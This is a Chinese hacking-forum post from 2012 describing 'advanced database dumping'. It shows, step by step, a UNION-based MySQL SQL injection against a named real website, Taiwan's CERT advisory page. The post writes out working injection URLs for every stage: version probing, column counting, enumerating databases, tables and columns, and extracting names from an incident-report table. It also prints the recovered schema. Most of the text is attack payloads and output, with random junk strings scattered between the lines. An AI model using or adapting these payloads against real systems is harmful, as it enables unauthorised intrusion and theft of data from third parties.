中国网络渗透测试联盟
标题:
.高级暴库方法讲解
[打印本页]
作者:
admin
时间:
2012-9-13 17:57
标题:
.高级暴库方法讲解
1.判断版本
http://www.cert.org.tw/document/advisory/detail.php?id=7
and ord(mid(version(),1,1))>51 返回正常,说明大于4.0版本,支持ounion查询
% @- G, r7 H4 j+ Y) Q0 D
2.猜解字段数目,用order by也可以猜,也可以用union select一个一个的猜解
9 O- n+ g5 ~5 S4 Z$ r! I; z9 X( J1 U
http://www.cert.org.tw/document/advisory/detail.php?id=7
and 2=4 union select 1,2,3,4,5,6,7,8,9--
1 v) C! v9 o( M8 m* Z
3.查看数据库版本及当前用户,
http://www.cert.org.tw/document/advisory/detail.php?id=7
and 2=4 union select 1,user(),version(),4,5,6,7,8,9--
; M9 U: m( x9 s" ]4 E) r& Z+ k
数据库版本5.1.35,据说mysql4.1以上版本支持concat函数,我也不知道是真是假,有待牛人去考证。
5 p, a( T8 A9 t0 {. q8 s- J
4.判断有没有写权限
" x8 ~& u, }* P' |' _
http://www.cert.org.tw/document/advisory/detail.php?id=7
and (select count(*) from MySQL.user)>0-- 返回错误,没有写权限
# W! k% ?" e7 W( q* D
没办法,手动猜表啦
# M9 o# l* O7 t/ w- x
5.查库,以前用union select 1,2,3,SCHEMA_NAME,5,6,n from information_schema.SCHEMATA limit 0,1
2 [5 s, B7 B6 R/ Z9 b
但是这个点有点不争气,用不了这个命令,就学习了下土耳其黑客的手法,不多说,如下
0 C$ Q1 E- s& R
http://www.cert.org.tw/document/ ... union+select+concat
(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_schema),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns--
9 p* }/ C8 o! l6 T) M2 v
成功查出所有数据库,国外的黑客就是不一般。数据库如下:
2 X0 L" h# B" a Y+ [$ r w+ O* C
information_schema,Advisory,IR,mad,member,mysql,twcert,vuldb,vulscandb
! y, i$ H8 @9 }: J) u
6.爆表,爆的是twcert库
0 S4 h1 c% b1 p8 h: Y2 I
http://www.cert.org.tw/document/ ... union+select+concat
(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_schema=0x747763657274--
$ i; S1 S5 P# d6 u" N
爆出如下表
1 n; E" S6 _ F
downloadfile,irsys,newsdata,secrpt,secrpt_big5
% T1 }! S0 q5 B( N, s3 K& |
7.爆列名,这次爆的是irsys表
3 f0 f: G0 Q2 H. n
http://www.cert.org.tw/document/ ... union+select+concat
(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+column_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_name=0x6972737973--
, Q9 S! m2 ~% U
爆出如下列
7 u5 M/ k5 `/ @' l' _5 V( ~4 Q& C
ir_id,name,company,email,tel,pubdate,rptdep,eventtype,eventdesc,machineinfo,procflow,memo,filename,systype,status
( ]+ g7 W4 B2 K
8.查询字段数,到这一步,国内很少有黑客去查询字段数的,直接用limit N,1去查询,直接N到报错为止。
f) x2 i' l. r" |
http://www.cert.org.tw/document/ ... union+select+concat
(0x5B78786F6F5D,CONCAT(count(*)),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys--
7 q! }4 Y" M( v6 r; s- c+ k
返回是3,说明每个列里有3个地段
! l b8 M9 u* f1 h- q- n
9.爆字段内容
1 G: [9 d+ o2 K( W' B
http://www.cert.org.tw/document/ ... union+select+concat
(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+0,1--
* \1 u* g8 A8 d
爆出name列的第一个字段的内容
$ i% h/ y# `' r" I: J. o
http://www.cert.org.tw/document/ ... union+select+concat
(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+1,1--
8 n& i x- ~/ D; v* W, E$ `
爆出name列的第二个字段的内容
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2